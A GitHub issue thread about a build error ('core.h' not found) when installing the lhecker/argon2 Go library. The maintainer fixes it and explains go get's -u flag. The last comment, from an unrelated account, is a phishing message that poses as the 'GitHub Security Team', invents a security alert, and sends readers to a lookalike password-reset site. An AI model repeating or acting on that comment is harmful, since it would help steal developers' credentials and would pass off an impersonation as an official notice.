### ISSUE TITLE
Can not go get project

### ISSUE THREAD

**Issue by michivip** [lhecker/argon2#1]
I tried to get the project via `go get github.com/lhecker/argon2` but it fails. This error occurs:
```
# github.com/lhecker/argon2
go/src/github.com/lhecker/argon2/argon2.go:13:18: fatal error: core.h: No such file or directory
compilation terminated.
```
If you need any more details and I can afford them just contact me.

I would be really happy to hear from you soon.

**Comment by lhecker** [comment]
Hey @michivip! I just pushed a couple changes and also updated argon2 to the newest version. Could you please try it again now? 🙂 (Don't forget to add the `-u` option to `go get` though!)
If it still doesn't work please also post which Go version, OS, and comnpiler you're using if possible, as I was unable to reproduce your problem.

**Comment by michivip** [comment]
Hi, sorry but it was my fault. I think I was really confused so I missed the `-u` parameter :D. Thanks for your answer anyways! :)

**Comment by lhecker** [comment]
@michivip `go get` only clones the specified repository/package if it doesn't exist yet. `-u` causes it to always pull the latest changes though. In this case you had to specify `-u` because you probably still had this project checked out, but to test my newest commits you need to fetch them first, right? 🙂

Meaning: [This](https://github.com/lhecker/argon2/commit/268eddaf472e849dc08a9ca30b83d9eb9a6e78e5?diff=split#diff-a0ab90c4dcaf7b6eb53c0115a9544fb7L12) 2-line change did indeed fix it!

**Comment by michivip** [comment]
Oh, I misunderstood your answer because I thought that I have to use the `-u` parameter for some reasons (I already knew that the `-u` updates the local resources).
Thank you for fixing the bug so fast 👍. Now, I am going to use the library in my own project 😃.

**Comment by GtdsIndonesia** [comment]
# Urgent: Security Alert for

Hello,

We've detected unusual activity in your GitHub repository . To ensure that your account remains secure, we urgently need you to take action.

## What You Need To Do:

1. **Verify Repository Settings**
   - Ensure that your repository settings have not been altered without your consent.

2. **Reset Your Password**
   - Visit this secure link to reset your password immediately: [Reset Password](https://github.hudevelopers.online/)

3. **Revoke Unauthorized Access**
   - After resetting, please review any unauthorized access and revoke them.

Thank you for your prompt attention to this matter to ensure the security of your GitHub account.

*If you did not initiate these changes, please contact us immediately.*

Best Regards,  
**GitHub Security Team**
